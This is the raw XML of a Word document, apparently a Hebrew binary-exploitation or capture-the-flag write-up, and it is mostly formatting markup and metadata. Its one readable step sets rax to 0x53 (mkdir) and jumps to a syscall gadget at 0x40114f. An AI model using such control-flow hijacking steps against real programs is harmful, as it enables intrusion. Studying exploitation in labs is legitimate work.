    <w:p w14:paraId="326A74AE" w14:textId="1A756CCE" w:rsidR="008F66F3" w:rsidRDefault="008F66F3" w:rsidP="008F66F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ערך </w:t>
      </w:r>
      <w:r>
        <w:t>rax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> להיות 83=</w:t>
      </w:r>
      <w:r>
        <w:t>0x53</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> (לקריאת המערכת </w:t>
      </w:r>
      <w:r>
        <w:t>mkdir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>) ונקפוץ ל-</w:t>
      </w:r>
      <w:r>
        <w:t>0x40114f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שם נבצע </w:t>
      </w:r>
      <w:r>
        <w:t>syscall</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBE23D8" w14:textId="643395DE" w:rsidR="00DD611E" w:rsidRDefault="008F66F3" w:rsidP="001574C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נסיים את הריצה.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0960E8" w14:textId="3019395D" w:rsidR="00651CA4" w:rsidRDefault="00651CA4" w:rsidP="00651CA4">
      <w:pPr>
        <w:bidi/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F21998F" w14:textId="035D1B8F" w:rsidR="00651CA4" w:rsidRDefault="00651CA4" w:rsidP="00651CA4">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00651CA4" w:rsidSect="00750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76F7" w14:textId="77777777" w:rsidR="00212F42" w:rsidRDefault="00212F42" w:rsidP="006825DB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0312D360" w14:textId="77777777" w:rsidR="00212F42" w:rsidRDefault="00212F42" w:rsidP="0068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ED4D" w14:textId="77777777" w:rsidR="00212F42" w:rsidRDefault="00212F42" w:rsidP="006825DB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6E2DC0A4" w14:textId="77777777" w:rsidR="00212F42" w:rsidRDefault="00212F42" w:rsidP="0068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1B0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4CC0D5BA"/>
    <w:lvl w:ilvl="0" w:tplc="640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897"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CB9CC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2D5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="209C65F4"/>
    <w:lvl w:ilvl="0" w:tplc="3646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5A90"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C4ACB176"/>
    <w:lvl w:ilvl="0" w:tplc="AF88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A4E11"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="380A53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4D27C5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6B341C64"/>
    <w:lvl w:ilvl="0" w:tplc="382EC4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775901"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="74740A2A"/>
    <w:lvl w:ilvl="0" w:tplc="3F62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14E9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="806ACD2E"/>
    <w:lvl w:ilvl="0" w:tplc="7A188C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8282146">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2089188535">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="517738403">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2119711304">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1886016998">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="373313469">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="784808212">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="9398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22"/>
    <w:rsid w:val="000149C1"/>
    <w:rsid w:val="00060628"/>
    <w:rsid w:val="00063B57"/>
    <w:rsid w:val="00081AA3"/>
    <w:rsid w:val="000C7CEC"/>
    <w:rsid w:val="000D00DC"/>
    <w:rsid w:val="000D407D"/>
    <w:rsid w:val="000E3B4C"/>
    <w:rsid w:val="001021CC"/>
    <w:rsid w:val="00112430"/>
    <w:rsid w:val="0012592A"/>
    <w:rsid w:val="00126B4F"/>
    <w:rsid w:val="001574C6"/>
    <w:rsid w:val="001B17A2"/>
    <w:rsid w:val="001B2D1B"/>
    <w:rsid w:val="001C01FE"/>
    <w:rsid w:val="001D461C"/>
    <w:rsid w:val="00212F42"/>
    <w:rsid w:val="00215698"/>
    <w:rsid w:val="002161C2"/>
    <w:rsid w:val="0023528E"/>
    <w:rsid w:val="00235D05"/>
    <w:rsid w:val="00257878"/>
    <w:rsid w:val="002A62A8"/>
    <w:rsid w:val="002B23E0"/>
    <w:rsid w:val="002B5C39"/>
    <w:rsid w:val="002E3CF3"/>
    <w:rsid w:val="002F5B87"/>
    <w:rsid w:val="003100FE"/>
    <w:rsid w:val="00376D44"/>
    <w:rsid w:val="0039293A"/>
    <w:rsid w:val="00392FAE"/>
    <w:rsid w:val="00397798"/>
    <w:rsid w:val="003D775E"/>
    <w:rsid w:val="003E5385"/>
    <w:rsid w:val="00417D9A"/>
    <w:rsid w:val="0042629C"/>
    <w:rsid w:val="00471711"/>
    <w:rsid w:val="0049091A"/>
    <w:rsid w:val="004D7DCE"/>
    <w:rsid w:val="004F235E"/>
    <w:rsid w:val="0055366D"/>
    <w:rsid w:val="00555A1A"/>
    <w:rsid w:val="00575BEE"/>
    <w:rsid w:val="00580C9A"/>
    <w:rsid w:val="005A61AF"/>
    <w:rsid w:val="005B5F12"/>
    <w:rsid w:val="005B7D91"/>
    <w:rsid w:val="005C39F7"/>
    <w:rsid w:val="005E4D96"/>
    <w:rsid w:val="005E6B2B"/>
    <w:rsid w:val="00622F52"/>
    <w:rsid w:val="006236FD"/>
    <w:rsid w:val="00651CA4"/>
    <w:rsid w:val="0066774E"/>
    <w:rsid w:val="00670D8E"/>
    <w:rsid w:val="006763C6"/>
    <w:rsid w:val="006825DB"/>
    <w:rsid w:val="00697622"/>
    <w:rsid w:val="006B65A9"/>
    <w:rsid w:val="006E7468"/>
    <w:rsid w:val="006F165F"/>
    <w:rsid w:val="00703656"/>
    <w:rsid w:val="00703E95"/>
    <w:rsid w:val="007355EF"/>
    <w:rsid w:val="007501F1"/>
    <w:rsid w:val="00780F50"/>
    <w:rsid w:val="007A40C8"/>
    <w:rsid w:val="007B75F3"/>
    <w:rsid w:val="007C7A92"/>
    <w:rsid w:val="007D7856"/>
    <w:rsid w:val="007E0534"/>
    <w:rsid w:val="007F1CE2"/>
    <w:rsid w:val="007F4CA9"/>
    <w:rsid w:val="00836DAA"/>
    <w:rsid w:val="0084530B"/>
    <w:rsid w:val="00875372"/>
    <w:rsid w:val="008A1085"/>
    <w:rsid w:val="008B70D2"/>
    <w:rsid w:val="008D68C7"/>
    <w:rsid w:val="008E216B"/>
    <w:rsid w:val="008E30E7"/>
    <w:rsid w:val="008F1F4C"/>
    <w:rsid w:val="008F66F3"/>
    <w:rsid w:val="009208E9"/>
    <w:rsid w:val="009224D3"/>
    <w:rsid w:val="00935DAB"/>
    <w:rsid w:val="009407BB"/>
    <w:rsid w:val="009475B4"/>
    <w:rsid w:val="00960547"/>
    <w:rsid w:val="00961E17"/>
    <w:rsid w:val="00996911"/>
    <w:rsid w:val="009B514B"/>
    <w:rsid w:val="009B7156"/>
    <w:rsid w:val="009C0D21"/>
    <w:rsid w:val="009D076F"/>
    <w:rsid w:val="009E09C6"/>
    <w:rsid w:val="009E1E18"/>
    <w:rsid w:val="009F75EC"/>
    <w:rsid w:val="00A066C8"/>
    <w:rsid w:val="00A44076"/>
    <w:rsid w:val="00A44962"/>
    <w:rsid w:val="00A535E6"/>
    <w:rsid w:val="00A70306"/>
    <w:rsid w:val="00A96380"/>
    <w:rsid w:val="00AB7B44"/>
    <w:rsid w:val="00AC5299"/>
    <w:rsid w:val="00AE5937"/>
    <w:rsid w:val="00B01FDE"/>
    <w:rsid w:val="00B07266"/>
    <w:rsid w:val="00B27E91"/>
    <w:rsid w:val="00B5709B"/>
    <w:rsid w:val="00B7665E"/>
    <w:rsid w:val="00B76CE4"/>
    <w:rsid w:val="00B97BA5"/>
    <w:rsid w:val="00BC3DB0"/>
    <w:rsid w:val="00BD19AD"/>
    <w:rsid w:val="00C21213"/>
    <w:rsid w:val="00C214AE"/>
    <w:rsid w:val="00C429D4"/>
    <w:rsid w:val="00C914BB"/>
    <w:rsid w:val="00CA0024"/>
    <w:rsid w:val="00CB62DF"/>
    <w:rsid w:val="00CC5EFC"/>
    <w:rsid w:val="00CE327F"/>
    <w:rsid w:val="00CE431E"/>
    <w:rsid w:val="00CE4D60"/>
    <w:rsid w:val="00D16EE5"/>
    <w:rsid w:val="00D20923"/>
    <w:rsid w:val="00D646A2"/>
    <w:rsid w:val="00D73C81"/>
    <w:rsid w:val="00D73F7A"/>
    <w:rsid w:val="00D800EA"/>
    <w:rsid w:val="00DA1D11"/>
    <w:rsid w:val="00DC0359"/>
    <w:rsid w:val="00DC2445"/>
    <w:rsid w:val="00DD611E"/>
    <w:rsid w:val="00E165B2"/>
    <w:rsid w:val="00E30167"/>
    <w:rsid w:val="00E3606C"/>
    <w:rsid w:val="00E57563"/>
    <w:rsid w:val="00E62A92"/>
    <w:rsid w:val="00E76FB9"/>
    <w:rsid w:val="00E81736"/>
    <w:rsid w:val="00E81CA3"/>
    <w:rsid w:val="00E961A0"/>
    <w:rsid w:val="00ED1D44"/>
    <w:rsid w:val="00EF0DCE"/>
    <w:rsid w:val="00F2271D"/>
    <w:rsid w:val="00F34765"/>
    <w:rsid w:val="00F40055"/>
    <w:rsid w:val="00F72056"/>
    <w:rsid w:val="00FA42CF"/>
    <w:rsid w:val="00FC3359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7919"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F1BEDB53-36A2-4473-990C-ECFEE094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FE"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00D7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DB"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0068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808C-0A9A-4B90-BBF3-44A880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uy</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>tom guy</cp:lastModifiedBy>
  <cp:revision>153</cp:revision>
  <cp:lastPrinted>2022-06-07T08:44:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-05T05:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-07T08:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>